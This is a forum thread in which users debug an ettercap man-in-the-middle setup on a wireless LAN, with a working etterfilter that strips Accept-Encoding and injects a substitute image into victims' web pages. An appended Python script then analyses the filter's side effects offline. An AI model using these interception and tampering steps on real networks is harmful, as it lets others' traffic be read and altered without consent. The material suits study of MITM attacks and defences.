
Thread: Problem when using ettercap filters to alter traffic

  1. #1 albanderuaz

    Default Problem when using ettercap filters to alter traffic

    Hi all!

    I am currently trying to alter HTTP traffic with ettercap. I am connected to a wireless LAN.

    In two shells I configure IP forwarding with
    Code:
    webmitm -i wlan0
    fragrouter -i wlan0 -B1
    No errors.

    Afterwards I start ettercap, start unified sniffing, scan for hosts, launch the MITM attack and start sniffing. I browse the net on another PC and I can see that the traffic gets redirected in the two shells. Internet works. I did not forget to remove the two wildcards in the etter.conf file in front of the iptables lines.

    I then try to use Irongeek's filter:

    Code:
    # Outbound requests: rename the Accept-Encoding header. The replacement has
    # the same length, so the TCP segment size is unchanged; the server does not
    # recognise the renamed header and answers with an uncompressed body.
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    # Inbound responses: point every <img src=...> at the substitute image.
    # This replacement is longer than the text it replaces, so the payload grows.
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       msg("Filter Ran.\n");
    }
    Ettercap says that the filter was applied (the window outputs "Filter Ran" and "zapped Accept-Encoding"), but the changes do not show up when I browse on my other PC.

    When I checked in Wireshark, I did see an alteration made (the "Rubbish" alteration), but the packets were described as TCP out-of-order. I didn't see the "img" alteration, though; in fact I didn't see any server response in Wireshark.
    I also tried using the Burp proxy suite with transproxy, but I could only intercept requests, and not server responses. How come?

    This is driving me crazy, I searched and searched for an answer, nothing seems to work.

    Any ideas? Many thanks for helping me
    Last edited by albanderuaz; 06-17-2010 at 09:29 PM. Reason: added details

  2. #2 killadaninja

    Default Re: Problem when using ettercap filters to alter traffic

    Quote Originally Posted by albanderuaz View Post
    On a shell i configure ip forwarding
    Quote Originally Posted by albanderuaz View Post
    I did not forget to remove the two wildcards in etter.conf file in front of iptables
    If you're manually configuring IP forwarding, or in your case using webmitm and fragrouter, why would you remove the comments in etter.conf? You don't want ettercap to control forwarding, right?
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  3. #3 thorin

    Default Re: Problem when using ettercap filters to alter traffic

    I don't think you can use an exclamation mark in an HTTP header.

    While "Rubbish!" is technically the same length as "Encoding" I think it would end up being ignored.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4 Gitsnik

    Default Re: Problem when using ettercap filters to alter traffic

    Quote Originally Posted by thorin View Post
    I don't think you can use an exclamation mark in an HTTP header.

    While "Rubbish!" is technically the same length as "Encoding" I think it would end up being ignored.
    Actually that's the general idea I believe.

    I agree with killa, BUT why use fragrouter etc. when ettercap is more than capable of doing it all for you? It could be that fragrouter is passing the packets through well before ettercap is finished with them, and then the out-of-order stuff is being ignored at the client end. Remember to KISS when you're putting these attack vectors together.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5

    Default Re: Problem when using ettercap filters to alter traffic

    I also tried to run the etterfilter from Irongeek and had the same issues as you!
    In my case the error was in the replace statements in the filter.

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src='http://www.irongeek.com/images/jollypwn.png' ");
       replace("IMG SRC=", "img src='http://www.irongeek.com/images/jollypwn.png' ");
       msg("Filter Ran.\n");
    }
    The difference is in the image URL. I changed the " to ' and for me it worked!
    Try it!

  6. #6 albanderuaz

    Default Re: Problem when using ettercap filters to alter traffic

    First of all, thank you for your answers. In fact, when I used ettercap to handle IP forwarding, the "filter ran" and "zapped..." messages never appeared in the ettercap window. That is why I tried using both. What do you think is better: using ettercap to IP forward, or using fragrouter and webmitm?

    edit: All right, I did other tests:
    -running ettercap and letting it manage IP forwarding (removed wildcards)
    -running webmitm and fragrouter for IP forwarding

    Ettercap still does not filter anything: 'Rubbish' packets are marked as TCP out-of-order and I can't see incoming packets in Wireshark, although ettercap reports that the 'img' alteration has been done.

    Thank you very much for your help!
    Last edited by albanderuaz; 06-19-2010 at 10:32 AM.

  7. #7 thorin

    Default Re: Problem when using ettercap filters to alter traffic

    Quote Originally Posted by Gitsnik View Post
    Actually that's the general idea I believe.

    I agree with killa BUT, why use fragrouter etc. when ettercap is more than capable of doing it all for you. It could be that fragrouter is passing the packets through well before ettercap is finished with them and then the out-of-order stuff is being ignored at the client end. Remember to KISS when you're putting these attack vectors together.
    I guess I wasn't clear. I think you can substitute a same length word, the problem I believe is that the word the OP used contained an exclamation point.
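Editor's added example, not code from the thread and not Irongeek's filter. It replays the two replace() rules of the filter in Python against a constructed HTTP request and response, so the points argued above can be checked offline: whether "Accept-Rubbish!" is a syntactically valid header name under RFC 7230, that the rename keeps the request the same length, that an origin server which only consults Accept-Encoding stops compressing once the header is renamed, and how much the image injection grows the response without touching Content-Length. The host example.test, the sample request and response, and the toy server policy are all constructed for the example; the image URL is the one from the filter.

```python
"""Replay the etterfilter rules on a constructed HTTP exchange and measure
the side effects. Added example; not part of the original thread."""
import string
from typing import Dict

# RFC 7230 "tchar": the characters permitted in an HTTP header field name.
TCHAR = set("!#$%&'*+-.^_`|~" + string.digits + string.ascii_letters)

IMG_URL = "http://www.irongeek.com/images/jollypwn.png"  # URL used by the filter


def is_valid_header_name(name: str) -> bool:
    """True if every character of the field name is an RFC 7230 tchar."""
    return bool(name) and all(c in TCHAR for c in name)


def zap_accept_encoding(request: bytes) -> bytes:
    """Same-length header rename (the tcp.dst == 80 branch of the filter)."""
    old, new = b"Accept-Encoding", b"Accept-Rubbish!"
    assert len(old) == len(new), "rename must not change the segment length"
    return request.replace(old, new)


def inject_img(response: bytes) -> bytes:
    """Image hijack (the tcp.src == 80 branch); the payload grows per match."""
    injected = b'img src="' + IMG_URL.encode() + b'" '
    return response.replace(b"img src=", injected).replace(b"IMG SRC=", injected)


def parse_headers(message: bytes) -> Dict[str, str]:
    """Minimal header parser; unknown header names are kept verbatim."""
    head = message.split(b"\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip()] = value.strip()
    return headers


def server_would_gzip(request: bytes) -> bool:
    """Toy origin-server policy (constructed): gzip the body only when the
    client advertises gzip in Accept-Encoding. A renamed header is simply
    an unknown field and is never consulted."""
    return "gzip" in parse_headers(request).get("Accept-Encoding", "")


def content_length_shortfall(response: bytes) -> int:
    """Body bytes beyond the declared Content-Length (0 when consistent).
    A client that reads exactly Content-Length bytes never sees the excess."""
    head, _, body = response.partition(b"\r\n\r\n")
    declared = int(parse_headers(head).get("Content-Length", "0"))
    return max(0, len(body) - declared)


# Constructed sample traffic (not captured from the thread's setup).
BODY = b'<html><body><img src="/logo.png"></body></html>'
REQUEST = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
           b"Accept-Encoding: gzip, deflate\r\n\r\n")
RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
            b"Content-Length: " + str(len(BODY)).encode() + b"\r\n\r\n" + BODY)


if __name__ == "__main__":
    zapped = zap_accept_encoding(REQUEST)
    print("header name valid:", is_valid_header_name("Accept-Rubbish!"))
    print("request length unchanged:", len(zapped) == len(REQUEST))
    print("server gzips before/after:",
          server_would_gzip(REQUEST), server_would_gzip(zapped))
    hijacked = inject_img(RESPONSE)
    print("response grew by", len(hijacked) - len(RESPONSE), "bytes")
    print("body bytes past Content-Length:", content_length_shortfall(hijacked))
```

Two things the script makes visible that the filter's own comments do not: the header rename is the only replacement that leaves the segment length untouched, while each matched `img src=` adds 46 bytes to the response and leaves the original Content-Length header as it was, so a client that honours Content-Length ignores the tail of the altered body. A payload that grows also shifts the TCP sequence space, and unless later sequence and acknowledgement numbers are rewritten to match, the two endpoints disagree about where the stream stands; any in-path tool that changes payload length has to handle that, on top of the filter itself being correct.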
